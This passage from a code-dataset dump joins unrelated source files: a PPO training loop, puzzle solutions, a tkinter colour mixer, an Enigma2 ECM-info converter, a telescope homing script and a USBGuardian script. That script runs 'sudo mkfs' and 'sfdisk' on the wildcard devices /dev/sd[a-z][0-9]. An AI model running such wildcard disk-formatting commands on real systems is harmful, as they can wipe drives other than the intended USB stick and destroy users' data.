bool(strtobool(x)),\n default=True,\n nargs=\"?\",\n const=True,\n help=\"Use GAE for advantage computation\")\n parser.add_argument(\"--gamma\", type=float, default=0.99)\n parser.add_argument(\"--gae-lambda\", type=float, default=0.95)\n parser.add_argument(\"--num-minibatches\", type=int, default=32)\n parser.add_argument(\"--update-epochs\",\n type=int,\n default=10,\n help=\"the K epochs to update the policy\")\n parser.add_argument(\"--norm-adv\",\n type=lambda x: bool(strtobool(x)),\n default=True,\n nargs=\"?\",\n const=True,\n help=\"Toggles advantages normalization\")\n parser.add_argument(\"--clip-coef\",\n type=float,\n default=0.2,\n help=\"the surrogate clipping coefficient\")\n parser.add_argument(\n \"--clip-vloss\",\n type=lambda x: bool(strtobool(x)),\n default=True,\n nargs=\"?\",\n const=True,\n help=\n \"Toggles whether or not to use a clipped loss for the value function, as per the paper.\"\n )\n parser.add_argument(\"--ent-coef\",\n type=float,\n default=0.0,\n help=\"coefficient of the entropy\")\n parser.add_argument(\"--vf-coef\",\n type=float,\n default=0.5,\n help=\"coefficient of the value function\")\n parser.add_argument(\"--max-grad-norm\",\n type=float,\n default=0.5,\n help=\"the maximum norm for the gradient clipping\")\n parser.add_argument(\"--target-kl\",\n type=float,\n default=None,\n help=\"the target KL divergence threshold\")\n args = parser.parse_args()\n args.batch_size = int(args.num_envs * args.num_steps)\n args.minibatch_size = int(args.batch_size // args.num_minibatches)\n return args\n\n\ndef make_env(env_id, seed):\n def thunk():\n env = gym.make(env_id)\n env.seed(seed)\n env.action_space.seed(seed)\n env.observation_space.seed(seed)\n return env\n return thunk\n\nclass Agent(nn.Module):\n\n def __init__(self, obs_dim, act_dim):\n super().__init__()\n self.critic = nn.Sequential(\n nn.Linear(obs_dim, 64),\n nn.Tanh(),\n nn.Linear(64, 64),\n nn.Tanh(),\n nn.Linear(64, 1),\n )\n self.actor_mean = nn.Sequential(\n nn.Linear(obs_dim, 64),\n nn.Tanh(),\n nn.Linear(64, 64),\n nn.Tanh(),\n nn.Linear(64, act_dim),\n )\n self.actor_logstd = nn.Parameter(torch.zeros(1, act_dim))\n\n def get_value(self, x):\n return self.critic(x)\n\n def get_action_and_value(self, x, action=None):\n action_mean = self.actor_mean(x)\n action_logstd = self.actor_logstd.expand_as(action_mean)\n action_std = torch.exp(action_logstd)\n probs = Normal(action_mean, action_std)\n if action is None:\n action = probs.sample()\n return action, probs.log_prob(action).sum(1), probs.entropy().sum(\n 1), self.critic(x)\n\n def sample_actions(self, x):\n action_mean = self.actor_mean(x)\n action_logstd = self.actor_logstd.expand_as(action_mean)\n action_std = torch.exp(action_logstd)\n dist = Normal(action_mean, action_std)\n actions = dist.sample()\n log_probs = dist.log_prob(actions).sum(axis=-1)\n return actions.clip(-0.99999, 0.99999), log_probs\n\n\nif __name__ == \"__main__\":\n args = parse_args()\n\n # TRY NOT TO MODIFY: seeding\n random.seed(args.seed)\n np.random.seed(args.seed)\n torch.manual_seed(args.seed)\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n # env setup\n eval_env = gym.make(args.env_id)\n obs_dim = eval_env.observation_space.shape[0]\n act_dim = eval_env.action_space.shape[0]\n envs = gym.vector.SyncVectorEnv([make_env(args.env_id, args.seed+i) for i in range(args.num_envs)])\n agent = Agent(obs_dim, act_dim).to(device)\n optimizer = optim.Adam(agent.parameters(), lr=args.learning_rate, eps=1e-5)\n\n # ALGO Logic: Storage 
setup\n obs = torch.zeros((args.num_steps, args.num_envs, obs_dim)).to(device)\n actions = torch.zeros((args.num_steps, args.num_envs, act_dim)).to(device)\n logprobs = torch.zeros((args.num_steps, args.num_envs)).to(device)\n rewards = torch.zeros((args.num_steps, args.num_envs)).to(device)\n dones = torch.zeros((args.num_steps, args.num_envs)).to(device)\n values = torch.zeros((args.num_steps, args.num_envs)).to(device)\n\n # TRY NOT TO MODIFY: start the game\n global_step = 0\n start_time = time.time()\n next_obs = torch.Tensor(envs.reset()).to(device)\n next_done = torch.zeros(args.num_envs).to(device)\n num_updates = args.total_timesteps // args.batch_size\n\n for update in trange(1, num_updates + 1):\n for step in range(0, args.num_steps):\n global_step += 1 * args.num_envs\n obs[step] = next_obs\n dones[step] = next_done\n\n # ALGO LOGIC: action logic\n with torch.no_grad():\n action, logprob, _, value = agent.get_action_and_value(\n next_obs)\n values[step] = value.flatten()\n actions[step] = action\n logprobs[step] = logprob\n\n # TRY NOT TO MODIFY: execute the game and log data.\n next_obs, reward, done, info = envs.step(action.cpu().numpy().clip(-0.99999, 0.99999))\n rewards[step] = torch.tensor(reward).to(device).view(-1)\n next_obs, next_done = torch.Tensor(next_obs).to(\n device), torch.Tensor(done).to(device)\n\n # bootstrap value if not done\n with torch.no_grad():\n next_value = agent.get_value(next_obs).reshape(1, -1)\n if args.gae:\n advantages = torch.zeros_like(rewards).to(device)\n lastgaelam = 0\n for t in reversed(range(args.num_steps)):\n if t == args.num_steps - 1:\n nextnonterminal = 1.0 - next_done\n nextvalues = next_value\n else:\n nextnonterminal = 1.0 - dones[t + 1]\n nextvalues = values[t + 1]\n delta = rewards[\n t] + args.gamma * nextvalues * nextnonterminal - values[\n t]\n advantages[\n t] = lastgaelam = delta + args.gamma * args.gae_lambda * nextnonterminal * lastgaelam\n returns = advantages + values\n else:\n returns = torch.zeros_like(rewards).to(device)\n for t in reversed(range(args.num_steps)):\n if t == args.num_steps - 1:\n nextnonterminal = 1.0 - next_done\n next_return = next_value\n else:\n nextnonterminal = 1.0 - dones[t + 1]\n next_return = returns[t + 1]\n returns[t] = rewards[\n t] + args.gamma * nextnonterminal * next_return\n advantages = returns - values\n\n # flatten the batch\n b_obs = obs.reshape((-1, ) + envs.single_observation_space.shape)\n b_logprobs = logprobs.reshape(-1)\n b_actions = actions.reshape((-1, ) + envs.single_action_space.shape)\n b_advantages = advantages.reshape(-1)\n b_returns = returns.reshape(-1)\n b_values = values.reshape(-1)\n\n # Optimizing the policy and value network\n b_inds = np.arange(args.batch_size)\n clipfracs = []\n for epoch in range(args.update_epochs):\n np.random.shuffle(b_inds)\n for start in range(0, args.batch_size, args.minibatch_size):\n end = start + args.minibatch_size\n mb_inds = b_inds[start:end]\n\n _, newlogprob, entropy, newvalue = agent.get_action_and_value(\n b_obs[mb_inds], b_actions[mb_inds])\n logratio = newlogprob - b_logprobs[mb_inds]\n ratio = logratio.exp()\n\n with torch.no_grad():\n # calculate approx_kl http://joschu.net/blog/kl-approx.html\n old_approx_kl = (-logratio).mean()\n approx_kl = ((ratio - 1) - logratio).mean()\n clipfracs += [((ratio - 1.0).abs() >\n args.clip_coef).float().mean().item()]\n\n mb_advantages = b_advantages[mb_inds]\n if args.norm_adv:\n mb_advantages = (mb_advantages - mb_advantages.mean()) / (\n mb_advantages.std() + 1e-8)\n\n # Policy 
loss\n pg_loss1 = -mb_advantages * ratio\n pg_loss2 = -mb_advantages * torch.clamp(\n ratio, 1 - args.clip_coef, 1 + args.clip_coef)\n pg_loss = torch.max(pg_loss1, pg_loss2).mean()\n\n # Value loss\n newvalue = newvalue.view(-1)\n if args.clip_vloss:\n v_loss_unclipped = (newvalue - b_returns[mb_inds])**2\n v_clipped = b_values[mb_inds] + torch.clamp(\n newvalue - b_values[mb_inds],\n -args.clip_coef,\n args.clip_coef,\n )\n v_loss_clipped = (v_clipped - b_returns[mb_inds])**2\n v_loss_max = torch.max(v_loss_unclipped, v_loss_clipped)\n v_loss = 0.5 * v_loss_max.mean()\n else:\n v_loss = 0.5 * ((newvalue - b_returns[mb_inds])**2).mean()\n\n entropy_loss = entropy.mean()\n loss = pg_loss - args.ent_coef * entropy_loss + v_loss * args.vf_coef\n\n optimizer.zero_grad()\n loss.backward()\n nn.utils.clip_grad_norm_(agent.parameters(),\n args.max_grad_norm)\n optimizer.step()\n\n if args.target_kl is not None:\n if approx_kl > args.target_kl:\n break\n\n y_pred, y_true = b_values.cpu().numpy(), b_returns.cpu().numpy()\n var_y = np.var(y_true)\n explained_var = np.nan if var_y == 0 else 1 - np.var(y_true -\n y_pred) / var_y\n\n # TRY NOT TO MODIFY: record rewards for plotting purposes\n eval_reward, _, _ = eval_policy(agent, eval_env)\n print(\n f\"#Step {global_step}: reward = {eval_reward:.2f}\\n\"\n f\"\\tvalue_loss={v_loss.item():.3f}, \"\n f\"policy_loss={pg_loss.item():.3f}, \"\n f\"entropy_loss={entropy_loss.item():.3f}\\n\"\n f\"\\tavg_old_logp={b_logprobs[mb_inds].mean().item():.3f}, \"\n f\"max_old_logp={b_logprobs[mb_inds].max().item():.3f}, \"\n f\"min_old_logp={b_logprobs[mb_inds].min().item():.3f}\\n\"\n f\"\\tavg_logp={newlogprob.mean().item():.3f}, \"\n f\"max_logp={newlogprob.max().item():.3f}, \"\n f\"min_logp={newlogprob.min().item():.3f}\\n\"\n f\"\\tavg_value={newvalue.mean().item():.3f}, \"\n f\"max_value={newvalue.max().item():.3f}, \"\n f\"min_value={newvalue.min().item():.3f}\\n\"\n f\"\\tavg_ratio={ratio.mean().item():.3f}, \"\n f\"max_ratio={ratio.max().item():.3f}, \"\n f\"min_ratio={ratio.min().item():.3f}\\n\"\n f\"\\tsampled_actions = (\"\n f\"{abs(b_actions[:, 0]).mean():.3f}, \"\n f\"{abs(b_actions[:, 1]).mean():.3f}, \"\n f\"{abs(b_actions[:, 2]).mean():.3f}, \"\n f\"{abs(b_actions[:, 3]).mean():.3f}, \"\n f\"{abs(b_actions[:, 4]).mean():.3f}, \"\n f\"{abs(b_actions[:, 5]).mean():.3f})\\n\"\n )\n envs.close()\n","repo_name":"fuyw/jrlzoo","sub_path":"ppo/mujoco/ppo_cleanrl/cleanrl.py","file_name":"cleanrl.py","file_ext":"py","file_size_in_byte":13808,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"9789002278","text":"from collections import defaultdict\r\nf=lambda:list(map(int,input().split()))\r\nn,m=f()\r\nh=f()\r\na=f();s=[]\r\nd=defaultdict(int)\r\nfor i in h:\r\n d[i]+=1\r\nh=sorted(list(d.keys()))\r\nn=len(h)\r\nfor i in a:\r\n l=-1;r=n\r\n while(r>l+1):\r\n mid=(l+r)//2\r\n if(h[mid]<=i):\r\n l=mid\r\n else:\r\n r=mid\r\n while(d[h[l]]==0 and l>-1):\r\n l-=1\r\n \r\n s=h[l] if l>=0 else -1\r\n print(s)\r\n d[h[l]]-=1\r\n","repo_name":"charlie219/CSES-Solutions","sub_path":"Sorting and Searching/Concert Tickets.py","file_name":"Concert Tickets.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"22635250671","text":"# Enter your code here. Read input from STDIN. 
Print output to STDOUT\n\nfrom collections import defaultdict\ndict = defaultdict(list)\nn,m=map(int,input().split())\n# print(n)\nfor i in range(n):\n A=input()\n dict[A].append(str(i+1))\nfor j in range(m):\n B=input()\n if B in dict:\n print(\" \".join(dict[B]))\n else: print (-1)\n \n \n \n \n \n","repo_name":"jealsab/Competitive-Programming","sub_path":"defaultdicttutorial.py","file_name":"defaultdicttutorial.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"26702474279","text":"\"\"\"\nExample of isotope specific extensions to the periodic table.\n\"\"\"\nfrom periodictable.core import Isotope\n\ndef init(table, reload=False):\n if 'shells' in table.properties and not reload: return\n table.properties.append('shells')\n\n # Set the default. This is required, even if it is only\n # setting it to None. If the attribute is missing then\n # the isotope data reverts to the element to supply the\n # value, which is almost certainly not what you want.\n Isotope.shells = None\n\n # Load the data\n for symbol,eldata in data.items():\n el = table.symbol(symbol)\n for iso,isodata in eldata.items():\n el[iso].shells = isodata\n\n# Define the data\ndata = dict(\n Fe = {56: \"56-Fe shell info\",\n 58: \"58-Fe shell info\",\n },\n )\n","repo_name":"pkienzle/periodictable","sub_path":"doc/sphinx/shelltable/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","stars":124,"dataset":"github-code","pt":"37"} +{"seq_id":"10329665441","text":"\"\"\"\nRGBの数字で計算をすることで絵具を混ぜるような体験が出来るプログラム\n\"\"\"\n\nimport tkinter\nimport random\n\ndef rgb2hex(r,g,b): #RGB配列からHTMLなどに使われる16進数表現へ\n # r , g , b = 0 〜 255 # int型\n color = (r, g , b)\n html_color = '#%02X%02X%02X' % (color[0],color[1],color[2])\n return html_color\n\ndef click_btn():\n red = 0\n green = 0\n blue = 0\n for i in range(7):\n if bvar[i].get() == True:\n red += colors[i][0]\n green += colors[i][1]\n blue += colors[i][2]\n red = int(red % 256) \n green = int(green % 256) \n blue = int(blue % 256) \n print((red,green,blue))\n text.delete(\"1.0\", tkinter.END)\n text.insert(\"1.0\", \"混ぜたらこんな色になりました。\")\n label = tkinter.Label(root,width = 40, height =3, bg =rgb2hex(red, green, blue) )\n label.place(x = 320,y = 70)\n\nroot = tkinter.Tk()\nroot.title(\"絵具混ぜ混ぜアプリ\")\nroot.resizable(False, False)\ncanvas = tkinter.Canvas(root, width=800, height=600)\ncanvas.pack()\ngazou = tkinter.PhotoImage(file=\"haikei.png\")\ncanvas.create_image(400, 300, image=gazou)\nbutton = tkinter.Button(text=\"MIX!!\", font=(\"Times New Roman\", 32), bg=\"lightgreen\", command=click_btn)\nbutton.place(x=400, y=480)\ntext = tkinter.Text(width=40, height=1, font=(\"Times New Roman\", 16))\ntext.place(x=320, y=30)\n\nbvar = [None]*7\ncbtn = [None]*7\nITEM = [\n\"赤\",\n\"ゴールド\",\n\"ミディアムストレートブルー\",\n\"ダークグリーン\",\n\"ドジャーブルー\",\n\"シエナ\",\n\"ダークグレー\"\n]\n\ncolors = [\n[255,0,0],\n[255,215,0],\n[123,104,238],\n[0,100,0],\n[30,144,255],\n[160,82,45],\n[169,169,169] \n] \n \nfor i in range(7):\n bvar[i] = tkinter.BooleanVar()\n bvar[i].set(False)\n cbtn[i] = tkinter.Checkbutton(text=ITEM[i], font=(\"Times New Roman\", 12), variable=bvar[i], bg=rgb2hex(colors[i][0], colors[i][1], colors[i][2]))\n cbtn[i].place(x=400, y=160+40*i)\nroot.mainloop()\n","repo_name":"OhataKazuki/my-program","sub_path":"プログラム教材改造/絵具混ぜ混ぜ/絵具混ぜ混ぜ 改造.py","file_name":"絵具混ぜ混ぜ 
改造.py","file_ext":"py","file_size_in_byte":1977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20778782075","text":"#!/usr/bin/python3.5\n#-*- coding:utf-8 -*-\n\nimport os\n\n#Unmount the USB stick\nos.system(\"sudo umount /mnt/usb\")\n\n#Open the report file\nwith open(\"/opt/USBGuardian/logs/report.log\") as report:\n\n\tfor line in report:\n\n\t\t#If the USB stick is not partitioned, create a partition and format it\n\t\tif \"Partitioned: no\" in line:\n\t\t\tos.system(\"echo ',,7;' | sfdisk /dev/sd[a-z]\")\n\t\t\tos.system(\"mkfs.vfat -I /dev/sd[a-z][0-9]\")\n\t\t\tbreak\n\n\t\t#If the USB stick is partitioned, format the USB stick depending on the format\n\t\telif \"FAT16\" in line:\n\t\t\tos.system(\"sudo mkfs.fat -F 16 -I /dev/sd[a-z][0-9]\")\n\t\t\tbreak\n\n\t\telif \"FAT32\" in line:\n\t\t\tos.system(\"sudo mkfs.fat -F 32 -I /dev/sd[a-z][0-9]\")\n\t\t\tbreak\n\n\t\telif \"VFAT\" in line:\n\t\t\tos.system(\"sudo mkfs.vfat -I /dev/sd[a-z][0-9]\")\n\t\t\tbreak\n","repo_name":"USBGuardian/USBGuardian","sub_path":"USBGuardian-core/USBGuardian/scripts/formatUSB.py","file_name":"formatUSB.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"37"} +{"seq_id":"75170950506","text":"# -*- coding: utf-8 -*-\n\n# ECM Line Converter\n#\n# Coded/Modified/Adapted by örlgrey\n# Based on VTi and/or OpenATV image source code\n#\n# This code is licensed under the Creative Commons \n# Attribution-NonCommercial-ShareAlike 3.0 Unported \n# License. To view a copy of this license, visit\n# http://creativecommons.org/licenses/by-nc-sa/3.0/ \n# or send a letter to Creative Commons, 559 Nathan \n# Abbott Way, Stanford, California 94305, USA.\n#\n# If you think this license infringes any rights,\n# please contact me at ochzoetna@gmail.com\n\nfrom enigma import iServiceInformation, iPlayableService\nfrom Components.Converter.Converter import Converter\nfrom Components.Element import cached\nfrom Components.Converter.Poll import Poll\nimport os, gettext\nfrom Tools.Directories import fileExists\nfrom Tools.Directories import resolveFilename, SCOPE_LANGUAGE, SCOPE_PLUGINS\nfrom Components.Language import language\n\nif fileExists(\"/etc/enigma2/ci0.xml\") or fileExists(\"/etc/enigma2/ci1.xml\"):\n\t\tCI = True\nelse:\n\t\tCI = False\n\nlang = language.getLanguage()\nos.environ[\"LANGUAGE\"] = lang[:2]\ngettext.bindtextdomain(\"enigma2\", resolveFilename(SCOPE_LANGUAGE))\ngettext.textdomain(\"enigma2\")\ngettext.bindtextdomain(\"KravenHD\", \"%s%s\" % (resolveFilename(SCOPE_PLUGINS), \"Extensions/KravenHD/locale/\"))\n\ndef _(txt):\n\tt = gettext.dgettext(\"KravenHD\", txt)\n\tif t == txt:\n\t\tt = gettext.gettext(txt)\n\treturn t\n\nclass KravenHDECMLine(Poll, Converter, object):\n\n\tSATINFO = 0\n\tVERYSHORTCAID = 1\n\tVERYSHORTREADER = 2\n\tSHORTREADER = 3\n\tNORMAL = 4\n\tLONG = 5\n\tVERYLONG = 6\n\n\tFTAINVISIBLE = 0\n\tFTAVISIBLE = 1\n\n\tdef __init__(self, type):\n\t\tPoll.__init__(self)\n\t\tConverter.__init__(self, type)\n\n\t\targs = type.split(',')\n\t\tif len(args) != 2:\n\t\t\traise ElementError(\"type must contain exactly 2 arguments\")\n\n\t\ttype = args.pop(0)\n\t\tinvisible = args.pop(0)\n\n\t\tif type == 'SatInfo':\n\t\t\tself.type = self.SATINFO\n\t\telif type == 'VeryShortCaid':\n\t\t\tself.type = self.VERYSHORTCAID\n\t\telif type == 'VeryShortReader':\n\t\t\tself.type = self.VERYSHORTREADER\n\t\telif type == 'ShortReader':\n\t\t\tself.type = 
self.SHORTREADER\n\t\telif type == 'Normal':\n\t\t\tself.type = self.NORMAL\n\t\telif type == 'Long':\n\t\t\tself.type = self.LONG\n\t\telse:\n\t\t\tself.type = self.VERYLONG\n\n\t\tif invisible == \"FTAInvisible\":\n\t\t\tself.invisible = self.FTAINVISIBLE\n\t\telse:\n\t\t\tself.invisible = self.FTAVISIBLE\n\n\t\tself.poll_interval = 1000\n\t\tself.poll_enabled = True\n\n\t@cached\n\tdef getText(self):\n\n\t\tif self.IsCrypted():\n\t\t\ttry:\n\t\t\t\tf = open('/tmp/ecm.info', 'r')\n\t\t\t\tflines = f.readlines()\n\t\t\t\tf.close()\n\t\t\texcept:\n\t\t\t\t\n\t\t\t\tif CI:\n\t\t\t\t\tecmline = _('CI Modul')\n\n\t\t\t\telse:\n\t\t\t\t\tecmline = _('waiting for information ...')\n\t\n\t\t\telse:\n\t\t\t\tcamInfo = {}\n\t\t\t\tfor line in flines:\n\t\t\t\t\tr = line.split(':', 1)\n\t\t\t\t\tif len(r) > 1 :\n\t\t\t\t\t\tcamInfo[r[0].strip('\\n\\r\\t ')] = r[1].strip('\\n\\r\\t ')\n\n\t\t\t\tcaid = camInfo.get('caid', '')\n\t\t\t\tcaid = caid.lstrip('0x')\n\t\t\t\tcaid = caid.upper()\n\t\t\t\tcaid = caid.zfill(4)\n\n\t\t\t\tif ((caid>='1800') and (caid<='18FF')):\n\t\t\t\t\tsystem = 'System: NAGRA'\n\t\t\t\telif ((caid>='1700') and (caid<='17FF')):\n\t\t\t\t\tsystem = 'System: BETA'\n\t\t\t\telif ((caid>='0E00') and (caid<='0EFF')):\n\t\t\t\t\tsystem = 'System: POWERVU'\n\t\t\t\telif ((caid>='0D00') and (caid<='0DFF')):\n\t\t\t\t\tsystem = 'System: CWORKS'\n\t\t\t\telif ((caid>='0B00') and (caid<='0BFF')):\n\t\t\t\t\tsystem = 'System: CONAX'\n\t\t\t\telif ((caid>='0900') and (caid<='09FF')):\n\t\t\t\t\tsystem = 'System: NDS'\n\t\t\t\telif ((caid>='0600') and (caid<='06FF')):\n\t\t\t\t\tsystem = 'System: IRDETO'\n\t\t\t\telif ((caid>='0500') and (caid<='05FF')):\n\t\t\t\t\tsystem = 'System: VIACCESS'\n\t\t\t\telif ((caid>='0100') and (caid<='01FF')):\n\t\t\t\t\tsystem = 'System: SECA'\n\t\t\t\telse:\n\t\t\t\t\tsystem = _('System: unknown')\n\n\t\t\t\tcaid = 'CAID: ' + str(caid)\n\n\t\t\t\tprov = camInfo.get('prov', '')\n\t\t\t\tprov = prov.lstrip(\"0x\")\n\t\t\t\tprov = prov.upper()\n\t\t\t\tprov = prov.zfill(6)\n\t\t\t\tprov = 'Provider: ' + prov\n\n\t\t\t\tecmtime = camInfo.get('ecm time', '')\n\t\t\t\tif ecmtime:\n\t\t\t\t\tif \"msec\" in ecmtime:\n\t\t\t\t\t\tecmtime = 'ECM: ' + ecmtime\n\t\t\t\t\telse:\n\t\t\t\t\t\tecmtime = 'ECM: ' + ecmtime + ' s'\n\n\t\t\t\thops = 'Hops: ' + str(camInfo.get('hops', ''))\n\t\t\t\taddress = 'Server: ' + str(camInfo.get('address', ''))\n\t\t\t\treader = 'Reader: ' + str(camInfo.get('reader', ''))\n\t\t\t\tsource = 'Source: ' + str(camInfo.get('source', ''))\n\t\t\t\tdecode = 'Decode: ' + str(camInfo.get('decode', ''))\n\n\t\t\t\tusing = str(camInfo.get('using', ''))\n\n\t\t\t\tactive = ''\n\n\t\t\t\tif source == 'emu':\n\t\t\t\t\tactive = 'EMU'\n\t\t\t\t\tecmline = active + ' - ' + caid\n\n\t\t\t\telif using == 'emu':\n\t\t\t\t\tactive = 'EMU'\n\t\t\t\t\tif self.type in (self.SATINFO, self.VERYSHORTCAID, self.VERYSHORTREADER):\n\t\t\t\t\t\tecmline = caid + ', ' + ecmtime\n\t\t\t\t\telse:\n\t\t\t\t\t\tecmline = active + ' - ' + caid + ' - ' + ecmtime\n\n\t\t\t\telif 'system' in camInfo :\n\t\t\t\t\tactive = 'CCCAM'\n\t\t\t\t\tif self.type == self.SATINFO:\n\t\t\t\t\t\tecmline = caid + ', ' + ecmtime\n\t\t\t\t\telif self.type == self.VERYSHORTCAID:\n\t\t\t\t\t\tecmline = caid + ' - ' + ecmtime\n\t\t\t\t\telif self.type == self.VERYSHORTREADER:\n\t\t\t\t\t\tecmline = address + ' - ' + ecmtime\n\t\t\t\t\telif self.type == self.SHORTREADER:\n\t\t\t\t\t\tecmline = caid + ' - ' + address + ' - ' + ecmtime\n\t\t\t\t\telif self.type == 
self.NORMAL:\n\t\t\t\t\t\tecmline = caid + ' - ' + address + ' - ' + hops + ' - ' + ecmtime\n\t\t\t\t\telif self.type == self.LONG:\n\t\t\t\t\t\tecmline = caid + ' - ' + system + ' - ' + address + ' - ' + hops + ' - ' + ecmtime\n\t\t\t\t\telse:\n\t\t\t\t\t\tecmline = active + ' - ' + caid + ' - ' + system + ' - ' + address + ' - ' + hops + ' - ' + ecmtime\n\n\t\t\t\telif 'decode' in camInfo :\n\t\t\t\t\tactive = 'GBOX'\n\t\t\t\t\tif self.type == self.SATINFO:\n\t\t\t\t\t\tecmline = active\n\t\t\t\t\telif self.type == self.VERYSHORTCAID:\n\t\t\t\t\t\tecmline = active\n\t\t\t\t\telif self.type == self.VERYSHORTREADER:\n\t\t\t\t\t\tecmline = active\n\t\t\t\t\telif self.type == self.SHORTREADER:\n\t\t\t\t\t\tecmline = active\n\t\t\t\t\telif self.type == self.NORMAL:\n\t\t\t\t\t\tecmline = active\n\t\t\t\t\telif self.type == self.LONG:\n\t\t\t\t\t\tecmline = active\n\t\t\t\t\telse:\n\t\t\t\t\t\tecmline = active\n\n\t\t\t\telif 'reader' in camInfo :\n\t\t\t\t\tactive = 'OSCAM'\n\t\t\t\t\tif self.type == self.SATINFO:\n\t\t\t\t\t\tecmline = caid + ', ' + ecmtime\n\t\t\t\t\telif self.type == self.VERYSHORTCAID:\n\t\t\t\t\t\tecmline = caid + ' - ' + ecmtime\n\t\t\t\t\telif self.type == self.VERYSHORTREADER:\n\t\t\t\t\t\tecmline = reader + ' - ' + ecmtime\n\t\t\t\t\telif self.type == self.SHORTREADER:\n\t\t\t\t\t\tecmline = caid + ' - ' + reader + ' - ' + ecmtime\n\t\t\t\t\telif self.type == self.NORMAL:\n\t\t\t\t\t\tecmline = caid + ' - ' + reader + ' - ' + hops + ' - ' + ecmtime\n\t\t\t\t\telif self.type == self.LONG:\n\t\t\t\t\t\tecmline = caid + ' - ' + system + ' - ' + reader + ' - ' + hops + ' - ' + ecmtime\n\t\t\t\t\telse:\n\t\t\t\t\t\tecmline = active + ' - ' + caid + ' - ' + system + ' - ' + reader + ' - ' + hops + ' - ' + ecmtime\n\n\t\t\t\telif 'prov' in camInfo :\n\t\t\t\t\tactive = 'MGCAMD'\n\t\t\t\t\tif self.type == self.SATINFO:\n\t\t\t\t\t\tecmline = caid + ', ' + ecmtime\n\t\t\t\t\telif self.type == self.VERYSHORTCAID:\n\t\t\t\t\t\tecmline = caid + ' - ' + ecmtime\n\t\t\t\t\telif self.type == self.VERYSHORTREADER:\n\t\t\t\t\t\tecmline = source + ' - ' + ecmtime\n\t\t\t\t\telif self.type == self.SHORTREADER:\n\t\t\t\t\t\tecmline = caid + ' - ' + source + ' - ' + ecmtime\n\t\t\t\t\telif self.type == self.NORMAL:\n\t\t\t\t\t\tecmline = caid + ' - ' + source + ' - ' + prov + ' - ' + ecmtime\n\t\t\t\t\telif self.type == self.LONG:\n\t\t\t\t\t\tecmline = caid + ' - ' + system + ' - ' + source + ' - ' + prov + ' - ' + ecmtime\n\t\t\t\t\telse:\n\t\t\t\t\t\tecmline = active + ' - ' + caid + ' - ' + system + ' - ' + source + ' - ' + prov + ' - ' + ecmtime\n\n\t\t\t\telse:\n\t\t\t\t\tactive = _('unknown')\n\t\t\t\t\tecmline = _('no information available')\n\n\t\telse:\n\t\t\tif self.invisible == self.FTAINVISIBLE:\n\t\t\t\tecmline = ''\n\t\t\telse:\n\t\t\t\tecmline = _('free to air')\n\n\t\treturn ecmline\n\n\ttext = property(getText)\n\n\t@cached\n\tdef IsCrypted(self):\n\t\tcrypted = 0\n\t\tservice = self.source.service\n\t\tif service:\n\t\t\tinfo = service and service.info()\n\t\t\tif info:\n\t\t\t\tcrypted = info.getInfo(iServiceInformation.sIsCrypted)\n\t\treturn crypted\n\n\tdef get_system_caid(self):\n\t\tcaidlist = []\n\t\tservice = self.source.service\n\t\tif service:\n\t\t\tinfo = service and service.info()\n\t\t\tif info:\n\t\t\t\tcaids = info.getInfoObject(iServiceInformation.sCAIDs)\n\t\t\t\tif caids:\n\t\t\t\t\tfor caid in caids:\n\t\t\t\t\t\tcaidlist.append((str(hex(int(caid)))))\n\t\treturn caidlist\n\n\tdef changed(self, what):\n\t\tif (what[0] == self.CHANGED_SPECIFIC and 
what[1] == iPlayableService.evUpdatedInfo) or what[0] == self.CHANGED_POLL:\n\t\t\tConverter.changed(self, what)\n","repo_name":"oerlgrey/KravenHD","sub_path":"usr/lib/enigma2/python/Components/Converter/KravenHDECMLine.py","file_name":"KravenHDECMLine.py","file_ext":"py","file_size_in_byte":8265,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"790618787","text":"__all__ = [\"HomeBothAxes\"]\n\nimport time\n\nfrom lsst.ts import salobj\nfrom lsst.ts.observatory.control.maintel.mtcs import MTCS, MTCSUsages\n\n\nclass HomeBothAxes(salobj.BaseScript):\n \"\"\"Home azimuth and elevation axes of the MTMount.\n Must call this after powering on the main axis and\n BEFORE you move them.\n\n Parameters\n ----------\n index : `int`\n Index of Script SAL component.\n\n Notes\n -----\n **Checkpoints**\n\n - \"Homing Both Axes\": Before commanding both axes to be homed.\n\n **Details**\n\n This script homes both aximuth and elevation axes of\n the Simonyi Main Telescope mount.\n\n\n \"\"\"\n\n def __init__(self, index, add_remotes: bool = True):\n super().__init__(index=index, descr=\"Raise M1M3\")\n\n mtcs_usage = None if add_remotes else MTCSUsages.DryTest\n\n self.mtcs = MTCS(domain=self.domain, intended_usage=mtcs_usage, log=self.log)\n\n self.home_both_axes_timeout = 300.0 # timeout to home both MTMount axes.\n\n @classmethod\n def get_schema(cls):\n return None\n\n async def configure(self, config):\n # This script does not require any configuration.\n pass\n\n def set_metadata(self, metadata):\n metadata.duration = self.home_both_axes_timeout\n\n async def run(self):\n await self.checkpoint(\"Disable M1M3 balance system.\")\n await self.mtcs.disable_m1m3_balance_system()\n\n await self.checkpoint(\"Homing Both Axes\")\n start_time = time.time()\n await self.mtcs.rem.mtmount.cmd_homeBothAxes.start(\n timeout=self.home_both_axes_timeout\n )\n end_time = time.time()\n elapsed_time = end_time - start_time\n\n self.log.info(f\"Homing both axes took {elapsed_time:.2f} seconds\")\n","repo_name":"lsst-ts/ts_standardscripts","sub_path":"python/lsst/ts/standardscripts/maintel/home_both_axes.py","file_name":"home_both_axes.py","file_ext":"py","file_size_in_byte":1752,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"37451636173","text":"# it is similar to the bytes\n# index starting from 0\n# byte array can be modified\n\nele = [10, 20, 30, 40, 50, 60]\nx = bytearray(ele)\n\n# update/ replace the element\nx[1] = 200\n\n# print the 